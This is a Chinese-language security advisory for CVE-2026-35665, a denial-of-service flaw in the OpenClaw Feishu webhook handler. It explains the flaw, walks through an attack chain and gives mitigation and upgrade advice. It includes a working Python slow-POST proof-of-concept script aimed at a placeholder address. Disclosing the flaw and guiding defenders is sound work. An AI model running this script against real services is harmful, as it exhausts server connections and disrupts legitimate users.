CVE-2026-35665 CVSS 5.3 中危

CVE-2026-35665 OpenClaw Feishu Webhook 拒绝服务漏洞

披露日期: 2026-04-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35665

漏洞类型

拒绝服务

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.3.24之前的版本存在拒绝服务漏洞，源于对CVE-2026-32011的不完整修复。Feishu webhook处理器在签名验证前接受请求体，且限制宽松（1MB，30秒超时）。未经认证的攻击者可利用并发慢速HTTP POST请求耗尽服务器连接资源，导致合法webhook被阻塞，从而引发拒绝服务。

技术细节

该漏洞源于OpenClaw在处理Feishu webhook请求时的逻辑缺陷。尽管开发者尝试修复之前的漏洞，但修复并不完整。系统在验证请求签名之前，就完全接收并解析请求体，且允许高达1MB的数据量和30秒的处理超时。攻击者无需认证即可发起攻击。通过发送大量并发的慢速HTTP POST请求（例如Slowloris攻击变种），利用宽松的超时机制长时间占用服务器连接线程和内存资源。当并发连接数达到服务器上限时，合法的webhook请求将无法被处理，从而导致服务拒绝（DoS）。这种攻击方式隐蔽，利用了协议处理顺序的漏洞，能轻易耗尽资源。

攻击链分析

STEP 1

1. 信息收集

攻击者识别出目标服务器上运行了OpenClaw，并确认Feishu webhook端点的URL路径。

STEP 2

2. 发起攻击

攻击者编写脚本，无需认证，向webhook端点发送大量并发的慢速HTTP POST请求。

STEP 3

3. 资源占用

由于服务器在签名验证前处理请求体且超时设置较长（30秒），攻击者的连接长时间占用服务器线程和内存。

STEP 4

4. 拒绝服务

服务器最大连接数被耗尽，合法的Feishu webhook请求无法建立连接，导致服务不可用。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket
import time

# PoC for CVE-2026-35665: OpenClaw DoS via Slow HTTP POST
# Target: Feishu Webhook Endpoint

# Configuration
target_host = "192.168.1.100"
target_port = 8080
path = "/api/webhook/feishu" # Adjust based on actual installation

headers = [
    f"POST {path} HTTP/1.1",
    f"Host: {target_host}",
    "Content-Type: application/json",
    "Content-Length: 1000000", # 1MB limit mentioned in vuln description
    "Connection: Keep-Alive",
    "\r\n"
]

def send_slow_post():
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(10)
        s.connect((target_host, target_port))
        
        # Send headers
        for header in headers:
            s.send((header + "\r\n").encode())
        
        print("[+] Headers sent, starting slow body transmission...")
        
        # Send payload slowly to keep connection open
        # Sending 1000 bytes every 1 second
        for i in range(1000):
            s.send(("A" * 1000).encode())
            time.sleep(1) 
            
        s.close()
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    print(f"[*] Starting DoS PoC against {target_host}:{target_port}")
    # Note: Run multiple instances concurrently to simulate the attack
    send_slow_post()

影响范围

OpenClaw < 2026.3.24

防御指南

临时缓解措施

建议立即升级OpenClaw至2026.3.24或更高版本。如暂无法升级，应在反向代理层（如Nginx）针对Feishu webhook接口实施严格的请求速率限制、缩小请求体大小限制，并缩短连接超时时间，确保在签名验证前不消耗过多服务器资源。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表